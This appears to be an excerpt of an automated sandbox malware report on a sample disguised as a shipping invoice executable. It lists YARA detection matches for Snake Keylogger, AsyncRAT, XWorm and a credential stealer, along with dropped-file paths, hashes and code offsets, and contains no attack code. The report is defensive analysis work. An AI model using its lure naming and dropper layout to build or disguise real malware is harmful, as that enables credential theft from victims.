Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000E.00000002.2103901162.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: bxhciy.exe PID: 7844, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: bxhciy.exe PID: 7844, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: ungagCKiEnZdl.exe PID: 4416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ungagCKiEnZdl.exe PID: 4416, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: SCS AWB and Commercial Invoice.exe

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0110DFC4	0_2_0110DFC4
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B30040	0_2_02B30040
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B3D120	0_2_02B3D120
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B3F458	0_2_02B3F458
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B372E8	0_2_02B372E8
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B30006	0_2_02B30006
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B3D110	0_2_02B3D110
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B397D8	0_2_02B397D8
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B389F0	0_2_02B389F0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B36EB0	0_2_02B36EB0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B38E28	0_2_02B38E28
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B38E18	0_2_02B38E18
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_02B32F60	0_2_02B32F60
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07087748	0_2_07087748
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07088658	0_2_07088658
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07086528	0_2_07086528
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708F9C0	0_2_0708F9C0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E048	0_2_0708E048
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07087739	0_2_07087739
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E778	0_2_0708E778
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E788	0_2_0708E788
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708DFC8	0_2_0708DFC8
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708DFF7	0_2_0708DFF7
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07088613	0_2_07088613
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_070896A0	0_2_070896A0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_070896B0	0_2_070896B0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708AEE0	0_2_0708AEE0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708AEF0	0_2_0708AEF0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708A500	0_2_0708A500
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07086501	0_2_07086501
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708AD10	0_2_0708AD10
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708AD20	0_2_0708AD20
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E522	0_2_0708E522
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07086D38	0_2_07086D38
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E530	0_2_0708E530
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07086D48	0_2_07086D48
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_070885BB	0_2_070885BB
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07088C98	0_2_07088C98
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07086493	0_2_07086493
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708A4F0	0_2_0708A4F0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07085A3A	0_2_07085A3A
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_07085A48	0_2_07085A48
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708AA80	0_2_0708AA80
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708AA90	0_2_0708AA90
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E2D0	0_2_0708E2D0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708E2E0	0_2_0708E2E0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708F2E0	0_2_0708F2E0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708A910	0_2_0708A910
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0708A920	0_2_0708A920
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 9_2_015863A8	9_2_015863A8
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 9_2_01588518	9_2_01588518
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 9_2_015856D0	9_2_015856D0
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 9_2_0158AC70	9_2_0158AC70
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 9_2_01585388	9_2_01585388
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 9_2_01580BA0	9_2_01580BA0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_018DDFC4	10_2_018DDFC4
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053CE748	10_2_053CE748
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C0040	10_2_053C0040
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053CC3F8	10_2_053CC3F8
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C97D8	10_2_053C97D8
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C0026	10_2_053C0026
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053CC3E8	10_2_053CC3E8
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C72E8	10_2_053C72E8
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C8E28	10_2_053C8E28
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C8E18	10_2_053C8E18
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C6EB0	10_2_053C6EB0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_053C89F0	10_2_053C89F0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E048	10_2_08F7E048
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7F9C0	10_2_08F7F9C0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F78C98	10_2_08F78C98
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F76528	10_2_08F76528
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F78658	10_2_08F78658
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F77739	10_2_08F77739
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A0B2	10_2_08F7A0B2
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E046	10_2_08F7E046
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A910	10_2_08F7A910
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A90A	10_2_08F7A90A
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E2E0	10_2_08F7E2E0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7F2E0	10_2_08F7F2E0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E2D0	10_2_08F7E2D0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F75A3A	10_2_08F75A3A
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A370	10_2_08F7A370
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7AC48	10_2_08F7AC48
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7AC3A	10_2_08F7AC3A
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F785CC	10_2_08F785CC
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F78558	10_2_08F78558
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F79530	10_2_08F79530
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E530	10_2_08F7E530
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F76D39	10_2_08F76D39
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E522	10_2_08F7E522
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F79520	10_2_08F79520
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F76501	10_2_08F76501
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7AEEF	10_2_08F7AEEF
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A7A0	10_2_08F7A7A0
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A790	10_2_08F7A790
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E788	10_2_08F7E788
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7E778	10_2_08F7E778
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 14_2_03110B92	14_2_03110B92
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 15_2_00007FF84887D150	15_2_00007FF84887D150
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 15_2_00007FF8488716C2	15_2_00007FF8488716C2
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 16_2_00007FF84885733F	16_2_00007FF84885733F
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 16_2_00007FF848853A82	16_2_00007FF848853A82
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 16_2_00007FF848853C68	16_2_00007FF848853C68
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 23_2_00007FF848847336	23_2_00007FF848847336
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 25_2_00007FF8488516C2	25_2_00007FF8488516C2
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 28_2_00007FF848867336	28_2_00007FF848867336

Source: bdeukn.exe.9.dr	Static PE information: No import functions for PE file found
Source: bxhciy.exe.9.dr	Static PE information: No import functions for PE file found

Source: SCS AWB and Commercial Invoice.exe, 00000000.00000002.2087681494.0000000002B40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs SCS AWB and Commercial Invoice.exe
Source: SCS AWB and Commercial Invoice.exe, 00000000.00000002.2090158251.00000000046A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs SCS AWB and Commercial Invoice.exe
Source: SCS AWB and Commercial Invoice.exe, 00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDOGGY NO SETTINGS.exe4 vs SCS AWB and Commercial Invoice.exe
Source: SCS AWB and Commercial Invoice.exe, 00000000.00000002.2091801496.0000000006FCA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exej% vs SCS AWB and Commercial Invoice.exe
Source: SCS AWB and Commercial Invoice.exe, 00000000.00000000.2034051972.000000000084C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemQns.exe6 vs SCS AWB and Commercial Invoice.exe
Source: SCS AWB and Commercial Invoice.exe, 00000000.00000002.2083523865.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SCS AWB and Commercial Invoice.exe
Source: SCS AWB and Commercial Invoice.exe	Binary or memory string: OriginalFilenamemQns.exe6 vs SCS AWB and Commercial Invoice.exe

Source: SCS AWB and Commercial Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.HOYVjVj.exe.352e4c4.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 10.2.HOYVjVj.exe.352e4c4.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.HOYVjVj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 14.2.HOYVjVj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.HOYVjVj.exe.352e4c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 10.2.HOYVjVj.exe.352e4c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.2.HOYVjVj.exe.35369a4.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 10.2.HOYVjVj.exe.35369a4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.HOYVjVj.exe.35369a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 10.2.HOYVjVj.exe.35369a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
